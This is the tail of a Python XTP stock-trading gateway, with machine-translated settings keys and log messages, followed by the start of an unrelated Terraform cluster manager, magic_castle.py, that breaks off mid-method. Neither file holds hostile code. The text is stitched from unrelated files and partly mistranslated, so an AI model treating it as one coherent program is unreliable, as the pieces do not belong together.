XTP_TICKER_TYPE.XTP_TICKER_TYPE_BOND: Product.BOND,
XTP_TICKER_TYPE.XTP_TICKER_TYPE_OPTION: Product.OPTION,
XTP_TICKER_TYPE.XTP_TICKER_TYPE_UNKNOWN: Product.EQUITY,
}
# DIRECTION_VT2XTP = {
# Direction.LONG: XTP_SIDE_BUY,
# Direction.SHORT: XTP_SIDE_SELL
# }
DIRECTION_VT2XTP = {
(Direction.LONG, Offset.OPEN): XTP_SIDE_MARGIN_TRADE,
(Direction.SHORT, Offset.CLOSE): XTP_SIDE_REPAY_MARGIN,
(Direction.SHORT, Offset.OPEN): XTP_SIDE_SHORT_SELL,
(Direction.LONG, Offset.CLOSE): XTP_SIDE_REPAY_STOCK,
(Direction.SHORT, Offset.NONE): XTP_SIDE_SELL,
(Direction.LONG, Offset.NONE): XTP_SIDE_BUY,
}
DIRECTION_XTP2VT = {v: k for k, v in DIRECTION_VT2XTP.items()}
ORDERTYPE_VT2XTP = {
OrderType.LIMIT: XTP_PRICE_TYPE.XTP_PRICE_LIMIT,
OrderType.MARKET: XTP_PRICE_TYPE.XTP_PRICE_BEST5_OR_CANCEL
}
ORDERTYPE_XTP2VT = {v: k for k, v in ORDERTYPE_VT2XTP.items()}
STATUS_XTP2VT = {
XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_INIT: Status.SUBMITTING,
XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_ALLTRADED: Status.ALLTRADED,
XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_PARTTRADEDQUEUEING: Status.PARTTRADED,
XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_PARTTRADEDNOTQUEUEING: Status.CANCELLED,
XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_NOTRADEQUEUEING: Status.NOTTRADED,
XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_CANCELED: Status.CANCELLED,
XTP_ORDER_STATUS_TYPE.XTP_ORDER_STATUS_REJECTED: Status.REJECTED,
}
symbol_name_map = {}
symbol_exchange_map = {}
class XtpGateway(BaseGateway):
default_setting = {
" account number ": "",
" password ": "",
" client number ": 1,
" quotes address ": "",
" quotes port ": 0,
" trading address ": "",
" trading port ": 0,
" quotes agreement ": ["TCP", "UDP"],
" authorization code ": ""
}
exchanges = list(EXCHANGE_VT2XTP.keys())
def __init__(self, event_engine: EventEngine):
""""""
super().__init__(event_engine, "XTP")
self.quote_api = XtpQuoteApi(self)
self.trader_api = XtpTraderApi(self)
set_async_callback_exception_handler(
self._async_callback_exception_handler)
def connect(self, setting: dict):
""""""
userid = setting[' account number ']
password = setting[' password ']
client_id = int(setting[' client number '])
quote_ip = setting[' quotes address ']
quote_port = int(setting[' quotes port '])
trader_ip = setting[' trading address ']
trader_port = int(setting[' trading port '])
quote_protocol = setting[" quotes agreement "]
software_key = setting[" authorization code "]
self.quote_api.connect(userid, password, client_id,
quote_ip, quote_port, quote_protocol)
self.trader_api.connect(userid, password, client_id,
trader_ip, trader_port, software_key)
self.init_query()
def close(self):
""""""
self.quote_api.close()
self.trader_api.close()
def subscribe(self, req: SubscribeRequest):
""""""
self.quote_api.subscrbie(req)
def send_order(self, req: OrderRequest) -> str:
""""""
return self.trader_api.send_order(req)
def cancel_order(self, req: CancelRequest):
""""""
self.trader_api.cancel_order(req)
def query_account(self):
""""""
self.trader_api.query_account()
def query_position(self):
""""""
self.trader_api.query_position()
def process_timer_event(self, event):
""""""
self.count += 1
if self.count < 2:
return
self.count = 0
func = self.query_functions.pop(0)
func()
self.query_functions.append(func)
def init_query(self):
""""""
self.count = 0
self.query_functions = [self.query_account, self.query_position]
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
def _async_callback_exception_handler(self, e: AsyncDispatchException):
error_str = f" an internal error occurred :\n" f" position :{e.instance}.{e.function_name}" f" details :{e.what}"
print(error_str)
class XtpQuoteApi(API.QuoteSpi):
def __init__(self, gateway: BaseGateway):
""""""
super().__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.userid = ""
self.password = ""
self.client_id: int = 0
self.server_ip = ""
self.server_port: int = 0
self.server_protocol = ""
self.api = None
def connect(
self,
userid: str,
password: str,
client_id: int,
server_ip: str,
server_port: int,
quote_protocol: str
):
""""""
if self.api:
return
self.userid = userid
self.password = password
self.client_id = client_id
self.server_ip = server_ip
self.server_port = server_port
if quote_protocol == "TCP":
self.quote_protocol = XTP_PROTOCOL_TYPE.XTP_PROTOCOL_TCP
else:
self.quote_protocol = XTP_PROTOCOL_TYPE.XTP_PROTOCOL_UDP
# Create API object
path = str(get_folder_path(self.gateway_name.lower()))
self.api = API.QuoteApi.CreateQuoteApi(
self.client_id,
path,
XTP_LOG_LEVEL.XTP_LOG_LEVEL_TRACE
)
self.api.RegisterSpi(self)
self.gateway.write_log(" quotes interface initialization successful ")
# Login to server
Thread(target=self.login).start()
def login(self):
""""""
ret = self.api.Login(
self.server_ip,
self.server_port,
self.userid,
self.password,
self.quote_protocol
)
if not ret:
msg = " quotes successful login server "
self.query_contract()
else:
msg = f" login failed server market , the reason :{ret}"
self.gateway.write_log(msg)
def close(self):
""""""
if self.api:
self.api.RegisterSpi(None)
self.api.Release()
def subscrbie(self, req: SubscribeRequest):
""""""
xtp_exchange = EXCHANGE_VT2XTP.get(req.exchange, "")
self.api.SubscribeMarketData([req.symbol], xtp_exchange)
def query_contract(self):
""""""
for exchange_id in EXCHANGE_XTP2VT.keys():
self.api.QueryAllTickers(exchange_id)
def check_error(self, func_name: str, error_info: XTPRspInfoStruct):
""""""
if error_info and error_info.error_id:
msg = f"{func_name} an error occurred , code :{error_info.error_id}, information :{error_info.error_msg}"
self.gateway.write_log(msg)
return True
else:
return False
def OnDisconnected(self, reason: int) -> Any:
""""""
self.gateway.write_log(" disconnect the server market ")
self.login()
def OnError(self, error_info: XTPRspInfoStruct) -> Any:
""""""
self.check_error(" quotes interface ", error_info)
def OnSubMarketData(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
self.check_error(" subscribe quotes ", error_info)
def OnUnSubMarketData(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
pass
def OnDepthMarketData(self, market_data: XTPMarketDataStruct, bid1_qty: Sequence[int],
bid1_count: int, max_bid1_count: int, ask1_qty: Sequence[int],
ask1_count: int, max_ask1_count: int) -> Any:
""""""
timestamp = str(market_data.data_time)
dt = datetime.strptime(timestamp, "%Y%m%d%H%M%S%f")
tick = TickData(
symbol=market_data.ticker,
exchange=EXCHANGE_XTP2VT[market_data.exchange_id],
datetime=dt,
volume=market_data.qty,
last_price=market_data.last_price,
limit_up=market_data.upper_limit_price,
limit_down=market_data.lower_limit_price,
open_price=market_data.open_price,
high_price=market_data.high_price,
low_price=market_data.low_price,
pre_close=market_data.pre_close_price,
bid_price_1=market_data.bid[0],
bid_price_2=market_data.bid[1],
bid_price_3=market_data.bid[2],
bid_price_4=market_data.bid[3],
bid_price_5=market_data.bid[4],
ask_price_1=market_data.ask[0],
ask_price_2=market_data.ask[1],
ask_price_3=market_data.ask[2],
ask_price_4=market_data.ask[3],
ask_price_5=market_data.ask[4],
bid_volume_1=market_data.bid_qty[0],
bid_volume_2=market_data.bid_qty[1],
bid_volume_3=market_data.bid_qty[2],
bid_volume_4=market_data.bid_qty[3],
bid_volume_5=market_data.bid_qty[4],
ask_volume_1=market_data.ask_qty[0],
ask_volume_2=market_data.ask_qty[1],
ask_volume_3=market_data.ask_qty[2],
ask_volume_4=market_data.ask_qty[3],
ask_volume_5=market_data.ask_qty[4],
gateway_name=self.gateway_name
)
tick.name = symbol_name_map.get(tick.vt_symbol, tick.symbol)
self.gateway.on_tick(tick)
def OnSubOrderBook(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
pass
def OnUnSubOrderBook(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
pass
def OnOrderBook(self, order_book: OrderBookStruct) -> Any:
""""""
pass
def OnSubTickByTick(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
pass
def OnUnSubTickByTick(self, ticker: XTPSpecificTickerStruct, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
pass
def OnTickByTick(self, tbt_data: XTPTickByTickStruct) -> Any:
""""""
pass
def OnSubscribeAllMarketData(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnUnSubscribeAllMarketData(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnSubscribeAllOrderBook(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnUnSubscribeAllOrderBook(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnSubscribeAllTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnUnSubscribeAllTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnQueryAllTickers(self, ticker_info: XTPQuoteStaticInfo, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
if self.check_error(" query contract ", error_info):
return
contract = ContractData(
symbol=ticker_info.ticker,
exchange=EXCHANGE_XTP2VT[ticker_info.exchange_id],
name=ticker_info.ticker_name,
product=PRODUCT_XTP2VT[ticker_info.ticker_type],
size=1,
pricetick=ticker_info.price_tick,
min_volume=ticker_info.buy_qty_unit,
gateway_name=self.gateway_name
)
self.gateway.on_contract(contract)
symbol_name_map[contract.vt_symbol] = contract.name
if contract.product != Product.INDEX:
symbol_exchange_map[contract.symbol] = contract.exchange
if is_last:
self.gateway.write_log(f"{contract.exchange.value} contract information inquiry succeed ")
def OnQueryTickersPriceInfo(self, ticker_info: XTPTickerPriceInfo, error_info: XTPRspInfoStruct,
is_last: bool) -> Any:
""""""
pass
def OnSubscribeAllOptionMarketData(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnUnSubscribeAllOptionMarketData(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnSubscribeAllOptionOrderBook(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnUnSubscribeAllOptionOrderBook(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnSubscribeAllOptionTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
def OnUnSubscribeAllOptionTickByTick(self, exchange_id: XTP_EXCHANGE_TYPE,
error_info: XTPRspInfoStruct) -> Any:
""""""
pass
class XtpTraderApi(API.TraderSpi):
def __init__(self, gateway: BaseGateway):
""""""
super().__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.userid = ""
self.password = ""
self.client_id = ""
self.server_ip = ""
self.server_port = ""
self.software_key = ""
self.api = None
self.session_id = 0
self.reqid = 0
# Whether current account supports margin or option
self.margin_trading = False
self.option_trading = False
#
self.short_positions = {}
def connect(
self,
userid: str,
password: str,
client_id: int,
server_ip: str,
server_port: int,
software_key: str
):
""""""
if self.api:
return
self.userid = userid
self.password = password
self.client_id = client_id
self.server_ip = server_ip
self.server_port = server_port
self.software_key = software_key
# Create API object
path = str(get_folder_path(self.gateway_name.lower()))
self.api = API.TraderApi.CreateTraderApi(
self.client_id,
path,
XTP_LOG_LEVEL.XTP_LOG_LEVEL_TRACE
)
self.api.RegisterSpi(self)
self.api.SetSoftwareKey(self.software_key)
self.api.SubscribePublicTopic(XTP_TE_RESUME_TYPE.XTP_TERT_RESTART)
self.gateway.write_log(" initialization successful transaction interface ")
# Login to server
Thread(target=self.login).start()
def login(self):
""""""
self.session_id = self.api.Login(
self.server_ip,
self.server_port,
self.userid,
self.password,
XTP_PROTOCOL_TYPE.XTP_PROTOCOL_TCP
)
if self.session_id:
msg = " transaction server login is successful "
else:
error = self.api.GetApiLastError()
msg = f" login failed transaction server , the reason :{error.error_msg}"
self.gateway.write_log(msg)
def close(self):
""""""
if self.api:
self.api.RegisterSpi(None)
self.api.Release()
def send_order(self, req: OrderRequest) -> str:
""""""
if req.exchange not in MARKET_VT2XTP:
self.gateway.write_log(f" commissioned failure , it does not support exchange {req.exchange.value}")
return ""
if req.type not in ORDERTYPE_VT2XTP:
self.gateway.write_log(f" commissioned failure , it does not support the delegate type {req.type.value}")
return ""
xtp_req = XTPOrderInsertInfo()
xtp_req.ticker = req.symbol
xtp_req.market = MARKET_VT2XTP[req.exchange]
xtp_req.price = req.price
xtp_req.quantity = int(req.volume)
xtp_req.side = DIRECTION_VT2XTP.get((req.direction, req.offset), "")
xtp_req.price_type = ORDERTYPE_VT2XTP[req.type]
if req.offset == Offset.NONE:
xtp_req.business_type = XTP_BUSINESS_TYPE.XTP_BUSINESS_TYPE_CASH
else:
xtp_req.business_type = XTP_BUSINESS_TYPE.XTP_BUSINESS_TYPE_MARGIN
orderid = self.api.InsertOrder(xtp_req, self.session_id)
order = req.create_order_data(str(orderid), self.gateway_name)
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
""""""
self.api.CancelOrder(int(req.orderid), self.session_id)
def query_account(self):
""""""
if not self.api:
return
self.reqid += 1
self.api.QueryAsset(self.session_id, self.reqid)
def query_position(self):
""""""
if not self.api:
return
self.reqid += 1
self.api.QueryPosition("", self.session_id, self.reqid)
if self.margin_trading:
self.reqid += 1
self.api.QueryCreditDebtInfo(self.session_id, self.reqid)
def check_error(self, func_name: str, error_info: XTPRspInfoStruct):
""""""
if error_info and error_info.error_id:
msg = f"{func_name} an error occurred , code :{error_info.error_id}, information :{error_info.error_msg}"
self.gateway.write_log(msg)
return True
else:
return False
def OnDisconnected(self, session_id: int, reason: int) -> Any:
""""""
self.gateway.write_log(" transaction server is disconnected ")
self.login()
def OnError(self, error_info: XTPRspInfoStruct) -> Any:
""""""
self.check_error(" trading interface ", error_info)
def OnOrderEvent(self, order_info: XTPOrderInfo, error_info: XTPRspInfoStruct,
session_id: int) -> Any:
""""""
self.check_error(" commissioned orders ", error_info)
direction, offset = DIRECTION_XTP2VT[order_info.side]
order = OrderData(
symbol=order_info.ticker,
exchange=MARKET_XTP2VT[order_info.market],
orderid=str(order_info.order_xtp_id),
type=ORDERTYPE_XTP2VT[order_info.price_type],
direction=direction,
offset=offset,
price=order_info.price,
volume=order_info.quantity,
traded=order_info.qty_traded,
status=STATUS_XTP2VT[order_info.order_status],
time=order_info.insert_time,
gateway_name=self.gateway_name
)
self.gateway.on_order(order)
def OnTradeEvent(self, trade_info: XTPTradeReport, session_id: int) -> Any:
""""""
direction, offset = DIRECTION_XTP2VT[trade_info.side]
trade = TradeData(
symbol=trade_info.ticker,
exchange=MARKET_XTP2VT[trade_info.market],
orderid=str(trade_info.order_xtp_id),
tradeid=str(trade_info.exec_id),
direction=direction,
offset=offset,
price=trade_info.price,
volume=trade_info.quantity,
time=trade_info.trade_time,
gateway_name=self.gateway_name
)
self.gateway.on_trade(trade)
def OnCancelOrderError(self, cancel_info: XTPOrderCancelInfo, error_info: XTPRspInfoStruct,
session_id: int) -> Any:
""""""
self.check_error(" commissioned cancellation ", error_info)
def OnQueryOrder(self, order_info: XTPOrderInfo, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
if self.check_error(" inquiry commission ", error_info):
return
self.updateOrder(order_info)
if is_last:
self.gateway.write_log(" information inquiry commissioned successfully ")
def OnQueryTrade(self, trade_info: XTPTradeReport, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
if self.check_error(" query deal ", error_info):
return
self.updateTrade(trade_info)
if is_last:
self.gateway.write_log(" query successful transaction information ")
def OnQueryPosition(self, xtp_position: XTPQueryStkPositionRsp, error_info: XTPRspInfoStruct,
request_id: int, is_last: bool, session_id: int) -> Any:
""""""
position = PositionData(
symbol=xtp_position.ticker,
exchange=MARKET_XTP2VT[xtp_position.market],
direction=Direction.LONG,
volume=xtp_position.total_qty,
frozen=xtp_position.locked_position,
price=xtp_position.avg_price,
pnl=xtp_position.unrealized_pnl,
yd_volume=xtp_position.yesterday_position,
gateway_name=self.gateway_name
)
self.gateway.on_position(position)
def OnQueryAsset(self, asset: XTPQueryAssetRsp, error_info: XTPRspInfoStruct,
request_id: int, is_last: bool, session_id: int) -> Any:
""""""
account = AccountData(
accountid=self.userid,
balance=asset.buying_power,
frozen=asset.withholding_amount,
gateway_name=self.gateway_name
)
self.gateway.on_account(account)
if asset.account_type == XTP_ACCOUNT_TYPE.XTP_ACCOUNT_CREDIT:
self.margin_trading = True
elif asset.account_type == XTP_ACCOUNT_TYPE.XTP_ACCOUNT_DERIVE:
self.option_trading = True
def OnQueryStructuredFund(self, fund_info: XTPStructuredFundInfo, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
pass
def OnQueryFundTransfer(self, fund_transfer_info: XTPFundTransferNotice, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
pass
def OnFundTransfer(self, fund_transfer_info: XTPFundTransferNotice, session_id: int) -> Any:
""""""
pass
def OnQueryETF(self, etf_info: XTPQueryETFBaseRsp, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
pass
def OnQueryETFBasket(self, etf_component_info: XTPQueryETFComponentRsp, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
pass
def OnQueryIPOInfoList(self, ipo_info: XTPQueryIPOTickerRsp, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
pass
def OnQueryIPOQuotaInfo(self, quota_info: XTPQueryIPOQuotaRsp, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
pass
def OnQueryOptionAuctionInfo(self, option_info: XTPQueryOptionAuctionInfoRsp, error_info: XTPRspInfoStruct,
is_last: bool, session_id: int) -> Any:
""""""
pass
def OnQueryCreditDebtInfo(self, debt_info: XTPCrdDebtInfo, error_info: XTPRspInfoStruct,
request_id: int, is_last: bool, session_id: int) -> Any:
""""""
if debt_info.debt_type == 1:
symbol = debt_info.ticker
exchange = MARKET_XTP2VT[debt_info.market]
position = self.short_positions.get(symbol, None)
if not position:
position = PositionData(
symbol=symbol,
exchange=exchange,
direction=Direction.SHORT,
gateway_name=self.gateway_name
)
self.short_positions[symbol] = position
position.volume += debt_info.remain_qty
if is_last:
for position in self.short_positions.values():
self.gateway.on_position(position)
self.short_positions.clear()
|
magic_castle.py
|
from os import path, environ, mkdir, remove, scandir, rename
from subprocess import run, CalledProcessError
from shutil import rmtree
from threading import Thread
from marshmallow import ValidationError
from models.magic_castle.magic_castle_configuration import MagicCastleConfiguration
from models.magic_castle.cluster_status_code import ClusterStatusCode
from models.magic_castle.plan_type import PlanType
from models.terraform.terraform_state_parser import TerraformStateParser
from models.terraform.terraform_plan_parser import TerraformPlanParser
from models.cloud.cloud_manager import CloudManager
from models.cloud.dns_manager import DnsManager
from models.puppet.provisioning_manager import ProvisioningManager
from exceptions.invalid_usage_exception import *
from exceptions.server_exception import *
from models.constants import TERRAFORM_STATE_FILENAME, CLUSTERS_PATH
from database.database_manager import DatabaseManager
import sqlite3
import logging
import json
DEFAULT_CLOUD = "openstack"
TERRAFORM_PLAN_BINARY_FILENAME = "terraform_plan"
TERRAFORM_PLAN_JSON_FILENAME = "terraform_plan.json"
TERRAFORM_APPLY_LOG_FILENAME = "terraform_apply.log"
TERRAFORM_PLAN_LOG_FILENAME = "terraform_plan.log"
class MagicCastle:
"""
Magic Castle is the class that manages the state of Magic Castle clusters.
It is responsible for building, modifying and destroying clusters using Terraform.
It is also used to parse the state of existing clusters and return it in
a simple dictionary format.
"""
def __init__(
self, database_connection: sqlite3.Connection, hostname=None, owner=None
):
self.__database_connection = database_connection
self.__hostname = hostname
self.__owner = owner
self.__configuration = None
self.__status = None
self.__plan_type = None
def get_hostname(self):
return self.__hostname
def get_cluster_name(self):
return self.__hostname.split(".", 1)[0]
def get_domain(self):
return self.__hostname.split(".", 1)[1]
def get_owner(self):
if self.__owner is None:
result = self.__database_connection.execute(
"SELECT owner FROM magic_castles WHERE hostname = ?",
(self.get_hostname(),),
).fetchone()
if result:
self.__owner = result[0]
else:
self.__owner = None
return self.__owner
def get_owner_username(self):
"""
MC Hub stores username in the form of eduPersonPrincipalName.
"""
owner = self.get_owner()
if owner:
return owner.split("@")[0]
return None
def set_configuration(self, configuration: dict):
try:
self.__configuration = MagicCastleConfiguration.get_from_dict(configuration)
self.__hostname = self.__configuration.get_hostname()
except ValidationError:
raise InvalidUsageException(
"The magic castle configuration could not be parsed."
)
def get_status(self) -> ClusterStatusCode:
if self.__status is None:
result = self.__database_connection.execute(
"SELECT status FROM magic_castles WHERE hostname = ?",
(self.get_hostname(),),
).fetchone()
if result:
self.__status = ClusterStatusCode(result[0])
else:
self.__status = ClusterStatusCode.NOT_FOUND
return self.__status
def __update_status(self, status: ClusterStatusCode):
self.__status = status
self.__database_connection.execute(
"UPDATE magic_castles SET status = ? WHERE hostname = ?",
(self.__status.value, self.__hostname),
)
self.__database_connection.commit()
# Log cluster status updates for log analytics
print(
json.dumps(
{
"hostname": self.get_hostname(),
"status": self.__status.value,
"owner": self.get_owner(),
}
),
flush=True,
)
def __rotate_terraform_logs(self, *, apply: bool):
"""
Rotates filenames for logs generated by running `terraform plan` or `terraform apply`.
For instance, it will rename an existing file named terraform_plan.log to terraform_plan.log.1.
Any log file already ending with a number will have its number incremented by one
(e.g. terraform_plan.log.1 would be renamed to terraform_plan.log.2).
:param apply: True to rotate logs of `terraform apply`, False to rotate logs of `terraform plan`.
"""
if apply:
base_file_name = TERRAFORM_APPLY_LOG_FILENAME
else:
base_file_name = TERRAFORM_PLAN_LOG_FILENAME
logs_path = path.join(CLUSTERS_PATH, self.get_hostname())
old_file_names = []
with scandir(logs_path) as it:
for entry in it:
if entry.is_file() and entry.name.startswith(base_file_name):
old_file_names.append(entry.name)
# Sort alphabetically to always rename the log file with the highest index first
old_file_names.sort(reverse=True)
for old_file_name in old_file_names:
if old_file_name == base_file_name:
# terraform_apply.log becomes terraform_apply.log.1
new_file_index = 1
else:
# terraform_apply.log.1 becomes terraform_apply.log.2 and so on
new_file_index = int(old_file_name.split(".")[-1]) + 1
new_file_name = f"{base_file_name}.{new_file_index}"
rename(
self.__get_cluster_path(old_file_name),
self.__get_cluster_path(new_file_name),
)
def get_plan_type(self) -> PlanType:
if self.__plan_type is None:
result = self.__database_connection.execute(
"SELECT plan_type FROM magic_castles WHERE hostname = ?",
(self.get_hostname(),),
).fetchone()
if result:
self.__plan_type = PlanType(result[0])
else:
self.__plan_type = PlanType.NONE
return self.__plan_type
def __update_plan_type(self, plan_type: PlanType):
self.__plan_type = plan_type
self.__database_connection.execute(
"UPDATE magic_castles SET plan_type = ? WHERE hostname = ?",
(self.__plan_type.value, self.__hostname),
)
self.__database_connection.commit()
def get_progress(self):
if self.__not_found():
raise ClusterNotFoundException
initial_plan = self.__get_plan()
if initial_plan is None:
return None
try:
with open(
self.__get_cluster_path(TERRAFORM_APPLY_LOG_FILENAME), "r"
) as file:
terraform_output = file.read()
except FileNotFoundError:
# terraform apply was not launched yet, therefore the log file does not exist
terraform_output = ""
return TerraformPlanParser.get_done_changes(initial_plan, terraform_output)
def dump_configuration(self, planned_only=False):
"""
Returns the Magic Castle configuration dictionary of the current cluster.
:param planned_only: Set to True to extract configuration exclusively from main.tf.json (runs faster). If set to
False, it will attempt to extract the configuration from the terraform state file if available (and otherwise
use the main.tf.json file).
:return: The configuration dictionary
"""
if self.__not_found():
raise ClusterNotFoundException
try:
terraform_state_file_available = not self.get_status() in [
ClusterStatusCode.BUILD_RUNNING,
ClusterStatusCode.DESTROY_RUNNING,
] and path.exists(self.__get_cluster_path(TERRAFORM_STATE_FILENAME))
if planned_only or not terraform_state_file_available:
self.__configuration = MagicCastleConfiguration.get_from_main_tf_json_file(
self.get_hostname(),
parse_floating_ips_from_state=terraform_state_file_available,
)
else:
self.__configuration = MagicCastleConfiguration.get_from_state_file(
self.get_hostname()
)
return self.__configuration.dump()
except FileNotFoundError:
return dict()
def get_freeipa_passwd(self):
if self.__is_busy():
return None
try:
with open(
self.__get_cluster_path(TERRAFORM_STATE_FILENAME), "r"
) as terraform_state_file:
state = json.load(terraform_state_file)
return TerraformStateParser(state).get_freeipa_passwd()
except FileNotFoundError:
return None
def get_available_resources(self):
if self.__is_busy():
raise BusyClusterException
try:
with open(
self.__get_cluster_path(TERRAFORM_STATE_FILENAME), "r"
) as terraform_state_file:
state = json.load(terraform_state_file)
parser = TerraformStateParser(state)
cloud_manager = CloudManager(
pre_allocated_instance_count=parser.get_instance_count(),
pre_allocated_ram=parser.get_ram(),
pre_allocated_cores=parser.get_cores(),
pre_allocated_volume_count=parser.get_volume_count(),
pre_allocated_volume_size=parser.get_volume_size(),
pre_allocated_floating_ips=parser.get_os_floating_ips(),
)
except FileNotFoundError:
cloud_manager = CloudManager()
return cloud_manager.get_available_resources()
def __is_busy(self):
return self.get_status() in [
ClusterStatusCode.PLAN_RUNNING,
ClusterStatusCode.BUILD_RUNNING,
ClusterStatusCode.DESTROY_RUNNING,
]
def __not_found(self):
return self.get_status() == ClusterStatusCode.NOT_FOUND
def __plan_created(self):
return self.get_status() != ClusterStatusCode.PLAN_RUNNING and path.exists(
self.__get_cluster_path(TERRAFORM_PLAN_BINARY_FILENAME)
)
def __found(self):
return self.get_status() != ClusterStatusCode.NOT_FOUND
def __get_cluster_path(self, sub_path=""):
"""
Returns the absolute path of the current cluster folder.
If sub_path is specified, it is appended to the cluster path.
"""
if self.get_hostname():
return path.join(CLUSTERS_PATH, self.get_hostname(), sub_path)
else:
raise FileNotFoundError
def plan_creation(self):
if self.__found():
raise ClusterExistsException
return self.__plan(destroy=False, existing_cluster=False)
def plan_modification(self):
if self.__not_found():
raise ClusterNotFoundException
if self.__is_busy():
raise BusyClusterException
return self.__plan(destroy=False, existing_cluster=True)
def plan_destruction(self):
if self.__not_found():
raise ClusterNotFoundException
if self.__is_busy():
raise BusyClusterException
self.__plan(destroy=True, existing_cluster=True)
def __plan(self, *, destroy, existing_cluster):
plan_type = PlanType.DESTROY if destroy else PlanType.BUILD
if existing_cluster:
self.__remove_existing_plan()
previous_status = self.get_status()
else:
self.__database_connection.execute(
"INSERT INTO magic_castles (hostname, cluster_name, domain, status, plan_type, owner) VALUES (?, ?, ?, ?, ?, ?)",
(
self.get_hostname(),
self.get_cluster_name(),
self.get_domain(),
ClusterStatusCode.CREATED.value,
plan_type.value,
self.get_owner(),
),
)
mkdir(self.__get_cluster_path())
previous_status = ClusterStatusCode.CREATED
self.__update_status(ClusterStatusCode.PLAN_RUNNING)
self.__update_plan_type(plan_type)
if not destroy:
self.__configuration.update_main_tf_json_file()
try:
run(
["terraform", "init", "-no-color", "-input=false"],
cwd=self.__get_cluster_path(),
capture_output=True,
check=True,
)
except CalledProcessError:
self.__update_status(previous_status)
raise PlanException(
"An error occurred while initializing Terraform.",
additional_details=f"hostname: {self.get_hostname()}",
)
self.__rotate_terraform_logs(apply=False)
with open(
self.__get_cluster_path(TERRAFORM_PLAN_LOG_FILENAME), "w"
) as output_file:
environment_variables = environ.copy()
dns_manager = DnsManager(self.get_domain())
environment_variables.update(dns_manager.get_environment_variables())
environment_variables["OS_CLOUD"] = DEFAULT_CLOUD
try:
run(
[
"terraform",
"plan",
"-input=false",
"-no-color",
"-destroy=" + ("true" if destroy else "false"),
"-out="
+ self.__get_cluster_path(TERRAFORM_PLAN_BINARY_FILENAME),
],
cwd=self.__get_cluster_path(),
env=environment_variables,
stdout=output_file,
stderr=output_file,
check=True,
)
except CalledProcessError:
if destroy:
# Terraform returns an error if we try to destroy a cluster when the image
# it was created with does not exist anymore (e.g. CentOS-7-x64-2019-07). In these cases,
# not refreshing the terraform state (refresh=false) solves the issue.
try:
run(
[
"terraform",
"plan",
"-refresh=false",
"-input=false",
"-no-color",
"-destroy=" + ("true" if destroy else "false"),
"-out="
+ self.__get_cluster_path(
TERRAFORM_PLAN_BINARY_FILENAME
),
],
cwd=self.__get_cluster_path(),
env=environment_variables,
stdout=output_file,
stderr=output_file,
check=True,
)
except CalledProcessError:
# terraform plan fails even without refreshing the state
self.__update_status(previous_status)
raise PlanException(
"An error occurred while planning changes.",
additional_details=f"hostname: {self.get_hostname()}",
)
else:
self.__update_status(previous_status)
raise PlanException(
"An error occurred while planning changes.",
additional_details=f"hostname: {self.get_hostname()}",
)
with open(
self.__get_cluster_path(TERRAFORM_PLAN_JSON_FILENAME), "w"
) as output_file:
try:
run(
[
"terraform",
"show",
"-no-color",
"-json",
TERRAFORM_PLAN_BINARY_FILENAME,
],
cwd=self.__get_cluster_path(),
stdout=output_file,
check=True,
)
except CalledProcessError:
self.__update_status(previous_status)
raise PlanException(
"An error occurred while exporting planned changes.",
additional_details=f"hostname: {self.get_hostname()}",
)
self.__update_status(previous_status)
def apply(self):
if self.__not_found():
raise ClusterNotFoundException
if self.__is_busy():
raise BusyClusterException
if not self.__plan_created():
raise PlanNotCreatedException
self.__update_status(
ClusterStatusCode.BUILD_RUNNING
if self.get_plan_type() == PlanType.BUILD
